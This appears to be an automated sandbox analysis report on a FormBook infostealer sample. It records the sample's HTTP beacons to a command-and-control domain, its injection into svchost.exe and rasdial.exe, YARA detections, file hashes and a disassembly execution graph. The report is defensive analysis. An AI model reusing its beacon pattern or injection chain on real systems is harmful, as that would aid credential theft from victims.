                  Data Ascii: 56gD=66z2jmSSsQrotaZUwxMUcZEjA6XVkFUEVmR8r7rm1mklW7FJtUQcF/6wt7MCnxWhj60jn5pXdIWVsqHUlfELy/rbcdef7S2shIU3D5IYqyZgEi/ZfSwuyLDSmjAedFr8n77q9q8ZI0E44V9cMJu4yG6BbWFcBpuNuf6AeyMl/o9HXJFZgJ2DLhHDtKl+TtE+Xlr6QcUzVqnexL1aAn6T3TYj5MX5V45HptRH2W7MZIP8Xdd1aUKK1bfz965eWrOlC1SLTbMhMTDNcsEk77gyUw4b4cljFR7L/vFjvhUXDljAy97R6YZaLbNUd/8U6+HWiDuGrB++A4Lo6aiDdyJXSZ0I6A8Yotc66RrVmtmzYjpw1X/gC1kKyC0JoxC7fQaraRLGlmM6api7nn6DrQG0XUYQSDQqUVVQ0M6mOkFIhwypIrUsIDt0TUOrUurxCZAw1h4LRCFIOsWRuLM8ZvObgDastJWruDLwsII8O+QVQ31v9vBdBNsVlKc5KvZ+x50HI0E68cm1p6zEF10nxa+2uBLmnSRIIkZkAK+gjy0VIRGgRERhu0ruT2jFjOqXcqHK6ZOCitEDH520e1n6TlgUZu8VcFTzjJkdvLw9ybf2P4dDCI0FC3zvpowATxkX2tqxvmegcpEmDeg+IZyV+P7CEr045C84OTBPgLLGM+BL6oc8ulj5uodRV9V5SMPiRYscC4YjLi4b1P9i6jgFx336LYgeOoV6Xa41QrsmFDJvSd1dzZkP/DimTcsm6BeeJ2IscJOg3Ewd17de0G4AW1jw9sCUZGtEQduc/zAMD8HJP9lt02D0b0FHBSihmrMQ2WE2PEy6pjoh9AKHPVWOGu9F7V0NOh2NByHknLubYhtpKifXhtjfs8H1e9tzjif9wkUsr/MdAJgKylgBerk9t/it4vscFdedc+umimItrzaFCODdsVRo6zO2KisGBRONXgwJdnPSqs5SsF9wGeQDKUko2WS2wFjPRIKeBwFGb0B8+3WoEXe [TRUNCATED]
                  Sep 4, 2024 09:39:00.656829119 CEST1121INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:39:00 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                  Accept-Ranges: bytes
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Content-Length: 836
                  Content-Type: text/html
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                  Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  52192.168.2.449789192.185.211.122805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:39:03.925112963 CEST487OUTGET /7o3y/?gTSpc=Khb8pT&56gD=34bWgTnU4AX1gKZq+j0JMo89G/eR8V4xUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UxrbVXfSA+Cuoh4JbcMUl7SslS3/OMRxqtpA= HTTP/1.1
                  Host: www.tadalaturbo.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:39:04.143879890 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:39:04 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                  Accept-Ranges: bytes
                  Content-Length: 2361
                  Vary: Accept-Encoding
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x19
                  Sep 4, 2024 09:39:04.143899918 CEST224INData Raw: 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70
                  Data Ascii: 2"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-
                  Sep 4, 2024 09:39:04.143907070 CEST1163INData Raw: 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 38 30 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 3e 0d 0a 20 20 20 20
                  Data Ascii: touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x180"> <link href="/cgi-sys/css/bootstrap.min.css" rel="stylesheet"> <link href="/cgi-sys/css/fonts.css" rel="stylesheet"> <link href="/cgi-sys/css/custom_404


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:03:34:54
                  Start date:04/09/2024
                  Path:C:\Users\user\Desktop\220204-TF1--00.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\220204-TF1--00.exe"
                  Imagebase:0x680000
                  File size:1'191'424 bytes
                  MD5 hash:7054B5F008CD2514DB7B7CDA8149978A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:1
                  Start time:03:34:57
                  Start date:04/09/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\220204-TF1--00.exe"
                  Imagebase:0xe0000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:5
                  Start time:03:35:25
                  Start date:04/09/2024
                  Path:C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe"
                  Imagebase:0xd30000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:6
                  Start time:03:35:27
                  Start date:04/09/2024
                  Path:C:\Windows\SysWOW64\rasdial.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                  Imagebase:0x390000
                  File size:19'456 bytes
                  MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:false

                  General

                  Target ID:7
                  Start time:03:35:39
                  Start date:04/09/2024
                  Path:C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe"
                  Imagebase:0xd30000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:9
                  Start time:03:35:51
                  Start date:04/09/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:0x7ff6bf500000
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:4.3%
                    Dynamic/Decrypted Code Coverage:0.4%
                    Signature Coverage:6.9%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:65
                    execution_graph 97158 68e608 97161 68d260 97158->97161 97160 68e616 97162 68d27d 97161->97162 97163 68d4dd 97161->97163 97164 6c2b0a 97162->97164 97165 6c2abb 97162->97165 97185 68d2a4 97162->97185 97175 68d6ab 97163->97175 97256 6ea0b5 89 API calls 4 library calls 97163->97256 97235 6fa6fb 341 API calls __cinit 97164->97235 97168 6c2abe 97165->97168 97176 6c2ad9 97165->97176 97169 6c2aca 97168->97169 97168->97185 97233 6fad0f 341 API calls 97169->97233 97173 68d594 97224 688bb2 68 API calls 97173->97224 97174 6c2cdf 97174->97174 97175->97160 97176->97163 97234 6fb1b7 341 API calls 3 library calls 97176->97234 97180 68d5a3 97180->97160 97181 6c2c26 97255 6faa66 89 API calls 97181->97255 97185->97163 97185->97173 97185->97175 97185->97181 97195 68a000 97185->97195 97218 6888a0 68 API calls __cinit 97185->97218 97219 6886a2 68 API calls 97185->97219 97220 688620 97185->97220 97225 68859a 68 API calls 97185->97225 97226 68d0dc 341 API calls 97185->97226 97227 689f3a 59 API calls Mailbox 97185->97227 97228 6a2f80 97185->97228 97231 68d060 89 API calls 97185->97231 97232 68cedd 341 API calls 97185->97232 97236 688bb2 68 API calls 97185->97236 97237 689e9c 97185->97237 97250 6d6d03 60 API calls 97185->97250 97251 6881a7 97185->97251 97196 68a01f 97195->97196 97212 68a04d Mailbox 97195->97212 97316 6a0ff6 97196->97316 97198 68b5d5 97199 6881a7 59 API calls 97198->97199 97213 68a1b7 97199->97213 97200 6877c7 59 API calls 97200->97212 97201 6a0ff6 59 API calls Mailbox 97201->97212 97204 6a2f80 67 API calls __cinit 97204->97212 97206 6c047f 97327 6ea0b5 89 API calls 4 library calls 97206->97327 97208 6881a7 59 API calls 97208->97212 97210 6d7405 59 API calls 97210->97212 97211 6c048e 97211->97185 97212->97198 97212->97200 97212->97201 97212->97204 97212->97206 97212->97208 97212->97210 97212->97213 97214 6c0e00 97212->97214 97216 68a6ba 97212->97216 97217 68b5da 97212->97217 97257 68ca20 97212->97257 97326 68ba60 60 API calls Mailbox 97212->97326 97213->97185 97329 6ea0b5 89 API calls 4 library calls 97214->97329 97328 6ea0b5 89 API calls 4 library calls 97216->97328 97330 6ea0b5 89 API calls 4 library calls 97217->97330 97218->97185 97219->97185 97221 68862b 97220->97221 97223 688652 97221->97223 98885 688b13 69 API calls Mailbox 97221->98885 97223->97185 97224->97180 97225->97185 97226->97185 97227->97185 98886 6a2e84 97228->98886 97230 6a2f8b 97230->97185 97231->97185 97232->97185 97233->97175 97234->97163 97235->97185 97236->97185 97238 689eaa 97237->97238 97248 689ed8 Mailbox 97237->97248 97239 689efd 97238->97239 97242 689eb0 Mailbox 97238->97242 97240 6881a7 59 API calls 97239->97240 97240->97248 97241 689ec4 97243 689f2c 97241->97243 97244 689ecf 97241->97244 97241->97248 97242->97241 97245 6bfe38 97242->97245 97243->97248 98918 688e34 97243->98918 97247 6bfe0f VariantClear 97244->97247 97244->97248 97245->97248 98922 6d7405 59 API calls 97245->98922 97247->97248 97248->97185 97250->97185 97252 6881ba 97251->97252 97253 6881b2 97251->97253 97252->97185 98923 6880d7 59 API calls 2 library calls 97253->98923 97255->97163 97256->97174 97258 68ca49 97257->97258 97259 68cac2 97257->97259 97262 68ca60 97258->97262 97266 6c25ed 97258->97266 97268 6c2617 97258->97268 97264 68a000 341 API calls 97259->97264 97271 6c24ef 97259->97271 97273 68cc3a 97259->97273 97291 68cbe5 97259->97291 97297 68cb82 97259->97297 97314 6c24f7 97259->97314 97261 6c25e1 97372 6ea0b5 89 API calls 4 library calls 97261->97372 97270 6c2745 97262->97270 97274 68ca71 97262->97274 97312 68ca88 Mailbox 97262->97312 97264->97259 97331 6fc9f3 97266->97331 97267 68cab7 97267->97212 97269 6c264b 97268->97269 97277 6c262f 97268->97277 97269->97266 97374 6fa528 59 API calls Mailbox 97269->97374 97272 6881a7 59 API calls 97270->97272 97370 689df0 59 API calls Mailbox 97271->97370 97272->97312 97273->97212 97274->97312 97478 6d7405 59 API calls 97274->97478 97373 6ea0b5 89 API calls 4 library calls 97277->97373 97278 6c2661 97284 6c26c5 97278->97284 97295 6c2679 97278->97295 97279 6c2819 97283 6c284f 97279->97283 97498 6fc5f4 96 API calls Mailbox 97279->97498 97281 6c2541 97282 6881a7 59 API calls 97281->97282 97282->97312 97287 689e9c 60 API calls 97283->97287 97395 6e7ba4 59 API calls 97284->97395 97287->97267 97290 6c27f7 97480 689997 97290->97480 97304 68cbf2 Mailbox 97291->97304 97369 6ea0b5 89 API calls 4 library calls 97291->97369 97292 6c282d 97294 689997 84 API calls 97292->97294 97308 6c2835 __wsetenvp 97294->97308 97375 6e7581 59 API calls Mailbox 97295->97375 97297->97291 97367 688ea0 59 API calls Mailbox 97297->97367 97299 6c26d7 97396 685ea1 59 API calls Mailbox 97299->97396 97302 6c27ff __wsetenvp 97302->97279 97307 689e9c 60 API calls 97302->97307 97304->97281 97304->97312 97368 6d7405 59 API calls 97304->97368 97305 6c269b 97376 68f5c0 97305->97376 97306 6c26e0 Mailbox 97397 6e7581 59 API calls Mailbox 97306->97397 97307->97279 97308->97283 97310 689e9c 60 API calls 97308->97310 97310->97283 97312->97267 97312->97279 97479 6fc4a7 85 API calls 2 library calls 97312->97479 97313 6c26f9 97398 68fe40 97313->97398 97314->97261 97314->97304 97314->97312 97371 6fc8d7 341 API calls 97314->97371 97319 6a0ffe 97316->97319 97317 6a594c std::exception::_Copy_str 58 API calls 97317->97319 97318 6a1018 97318->97212 97319->97317 97319->97318 97321 6a101c std::exception::exception 97319->97321 98882 6a35e1 DecodePointer 97319->98882 98883 6a87db RaiseException 97321->98883 97323 6a1046 98884 6a8711 58 API calls _free 97323->98884 97325 6a1058 97325->97212 97326->97212 97327->97211 97328->97213 97329->97217 97330->97213 97499 6877c7 97331->97499 97335 6fca51 97336 6fcab9 97335->97336 97337 6fca85 97335->97337 97339 6fcad0 97336->97339 97343 6fcaf3 97336->97343 97516 6f96db 341 API calls Mailbox 97337->97516 97342 6fcad5 97339->97342 97517 687d2c 97339->97517 97340 6fca3a 97344 6a2f80 __cinit 67 API calls 97340->97344 97341 6fca99 97346 6fca9d 97341->97346 97364 6fcaaa 97341->97364 97348 689e9c 60 API calls 97342->97348 97345 6881a7 59 API calls 97343->97345 97344->97335 97353 6fcaf1 97345->97353 97528 6ea0b5 89 API calls 4 library calls 97346->97528 97355 6fcb46 Mailbox 97348->97355 97353->97346 97358 6fcb48 97353->97358 97526 6fa2d2 341 API calls 97353->97526 97354 6fcb39 97357 6fcb3d 97354->97357 97354->97358 97533 6d66f4 59 API calls Mailbox 97355->97533 97356 6fcb7d 97356->97346 97359 6fcb98 97356->97359 97527 6e9ea3 89 API calls 4 library calls 97357->97527 97358->97346 97504 6fa1f2 97358->97504 97359->97342 97362 6fcbc2 97359->97362 97362->97364 97365 6fcc0b 97362->97365 97363 6fcc36 97363->97312 97364->97355 97529 6e77cf 97364->97529 97366 6fc9f3 341 API calls 97365->97366 97366->97355 97367->97291 97368->97304 97369->97271 97370->97314 97371->97314 97372->97266 97373->97267 97374->97278 97375->97305 97377 68f61a 97376->97377 97378 68f7b0 97376->97378 97379 6c4848 97377->97379 97380 68f626 97377->97380 97381 687f41 59 API calls 97378->97381 97712 6fbf80 341 API calls Mailbox 97379->97712 97710 68f3f0 341 API calls 2 library calls 97380->97710 97387 68f6ec Mailbox 97381->97387 97384 6c4856 97388 68f790 97384->97388 97713 6ea0b5 89 API calls 4 library calls 97384->97713 97386 68f65d 97386->97384 97386->97387 97386->97388 97390 68f743 97387->97390 97618 6ecde5 97387->97618 97698 6fe24b 97387->97698 97701 684faa 97387->97701 97707 6e3e73 97387->97707 97388->97314 97390->97388 97711 689df0 59 API calls Mailbox 97390->97711 97395->97299 97396->97306 97397->97313 98678 6882e0 97398->98678 97400 68fe9d 97401 6c4b57 97400->97401 97447 690856 97400->97447 98683 68f394 97400->98683 98786 6ea0b5 89 API calls 4 library calls 97401->98786 97405 6c4b6c 97406 68ff9e 97407 6c4cb7 97406->97407 97411 68ffac 97406->97411 98790 6d6c62 59 API calls 2 library calls 97406->98790 97407->97405 97407->97411 98792 6fa5ee 85 API calls Mailbox 97407->98792 97408 690677 97413 6a0ff6 Mailbox 59 API calls 97408->97413 97410 6c4c01 97410->97405 98788 6ea0b5 89 API calls 4 library calls 97410->98788 97417 6c4d23 97411->97417 97467 6c4f7d 97411->97467 98687 6884dc 97411->98687 97424 6906a5 _memmove 97413->97424 97414 6c4c72 98791 6d6665 59 API calls 2 library calls 97414->98791 97425 6c4d41 97417->97425 98794 688720 59 API calls Mailbox 97417->98794 97420 6c4b7f 97420->97410 98787 68f803 341 API calls 97420->98787 97422 6c4cdc Mailbox 97422->97411 98793 6d6c62 59 API calls 2 library calls 97422->98793 97432 6a0ff6 Mailbox 59 API calls 97424->97432 97429 6c4d52 97425->97429 98795 688720 59 API calls Mailbox 97425->98795 97426 690004 97435 690092 97426->97435 97436 6c4f00 97426->97436 97464 6902d9 Mailbox _memmove 97426->97464 97427 6c4c95 97430 68a000 341 API calls 97427->97430 97429->97464 98796 6d6621 59 API calls Mailbox 97429->98796 97430->97407 97431 6a0ff6 59 API calls Mailbox 97440 68ff33 97431->97440 97460 690266 _memmove 97432->97460 97437 6a0ff6 Mailbox 59 API calls 97435->97437 98800 6e9d71 60 API calls 97436->98800 97442 690099 97437->97442 97440->97405 97440->97406 97440->97408 97440->97420 97440->97424 97440->97431 97441 68a000 341 API calls 97440->97441 97452 6c4c36 97440->97452 97441->97440 97442->97447 98694 690b30 97442->98694 97443 68a000 341 API calls 97445 6c4eb1 97443->97445 97445->97405 97450 688620 69 API calls 97445->97450 97446 690112 97446->97424 97446->97447 97455 690146 97446->97455 98785 6ea0b5 89 API calls 4 library calls 97447->98785 97454 6c4edc 97450->97454 98789 6ea0b5 89 API calls 4 library calls 97452->98789 98799 6ea0b5 89 API calls 4 library calls 97454->98799 97459 6881a7 59 API calls 97455->97459 97462 690167 97455->97462 97458 689e9c 60 API calls 97458->97464 97459->97462 97460->97464 97477 6902c2 97460->97477 98784 689df0 59 API calls Mailbox 97460->98784 97461 6a0ff6 59 API calls Mailbox 97461->97464 97462->97447 97465 6c4f4e 97462->97465 97469 6901ac 97462->97469 97463 6904f8 97463->97314 97464->97447 97464->97454 97464->97458 97464->97461 97464->97463 97471 6c4e46 97464->97471 97476 6c4e77 97464->97476 98782 6888a0 68 API calls __cinit 97464->98782 98783 6887c0 68 API calls 97464->98783 98797 6e5bd9 68 API calls 97464->98797 98798 688b13 69 API calls Mailbox 97464->98798 97466 689e9c 60 API calls 97465->97466 97466->97467 97467->97405 98801 6ea0b5 89 API calls 4 library calls 97467->98801 97468 690238 97470 689e9c 60 API calls 97468->97470 97469->97447 97469->97467 97469->97468 97472 69024b 97470->97472 97473 6a0ff6 Mailbox 59 API calls 97471->97473 97472->97447 98771 68843f 97472->98771 97473->97476 97476->97443 97477->97314 97478->97312 97479->97290 97481 6899ab 97480->97481 97482 6899b1 97480->97482 97481->97302 97483 6bf9fc __i64tow 97482->97483 97484 6899f9 97482->97484 97488 6899b7 __itow 97482->97488 97489 6bf903 97482->97489 98880 6a38d8 83 API calls 3 library calls 97484->98880 97487 6a0ff6 Mailbox 59 API calls 97490 6899d1 97487->97490 97488->97487 97491 6a0ff6 Mailbox 59 API calls 97489->97491 97496 6bf97b Mailbox _wcscpy 97489->97496 97490->97481 97492 687f41 59 API calls 97490->97492 97493 6bf948 97491->97493 97492->97481 97494 6a0ff6 Mailbox 59 API calls 97493->97494 97495 6bf96e 97494->97495 97495->97496 97497 687f41 59 API calls 97495->97497 98881 6a38d8 83 API calls 3 library calls 97496->98881 97497->97496 97498->97292 97500 6a0ff6 Mailbox 59 API calls 97499->97500 97501 6877e8 97500->97501 97502 6a0ff6 Mailbox 59 API calls 97501->97502 97503 6877f6 97502->97503 97503->97335 97512 687f41 97503->97512 97505 6fa247 Mailbox 97504->97505 97506 6fa204 97504->97506 97505->97356 97507 687f41 59 API calls 97506->97507 97508 6fa213 97507->97508 97509 6e77cf 59 API calls 97508->97509 97510 6fa22a 97509->97510 97534 6f9d4c 97510->97534 97513 687f50 __wsetenvp _memmove 97512->97513 97514 6a0ff6 Mailbox 59 API calls 97513->97514 97515 687f8e 97514->97515 97515->97340 97516->97341 97518 687d38 __wsetenvp 97517->97518 97519 687da5 97517->97519 97521 687d4e 97518->97521 97522 687d73 97518->97522 97610 687e8c 97519->97610 97606 688087 59 API calls Mailbox 97521->97606 97607 688189 97522->97607 97525 687d56 _memmove 97525->97353 97526->97354 97527->97355 97528->97355 97530 6e77da 97529->97530 97531 6a0ff6 Mailbox 59 API calls 97530->97531 97532 6e77e8 97531->97532 97532->97355 97533->97363 97535 6f9d62 97534->97535 97536 6f9d79 97534->97536 97535->97536 97538 6f9d8b 97535->97538 97580 6f96db 341 API calls Mailbox 97536->97580 97539 6f9dad 97538->97539 97540 6f9d96 97538->97540 97541 6f9de4 97539->97541 97542 6f9db3 97539->97542 97549 6f9e38 97540->97549 97546 6893ea 59 API calls 97541->97546 97548 6f9da8 97541->97548 97576 6893ea 97542->97576 97546->97548 97548->97505 97551 6f9e8e 97549->97551 97552 6f9e78 97549->97552 97600 6f96db 341 API calls Mailbox 97551->97600 97552->97551 97581 6d7a1e 97552->97581 97554 6f9ed9 97554->97551 97555 6f9ee8 97554->97555 97561 6f9f11 97555->97561 97585 6d76c5 97555->97585 97557 6fa055 VariantInit 97566 6fa08a _memset 97557->97566 97562 6f9f8d 97561->97562 97595 6d7096 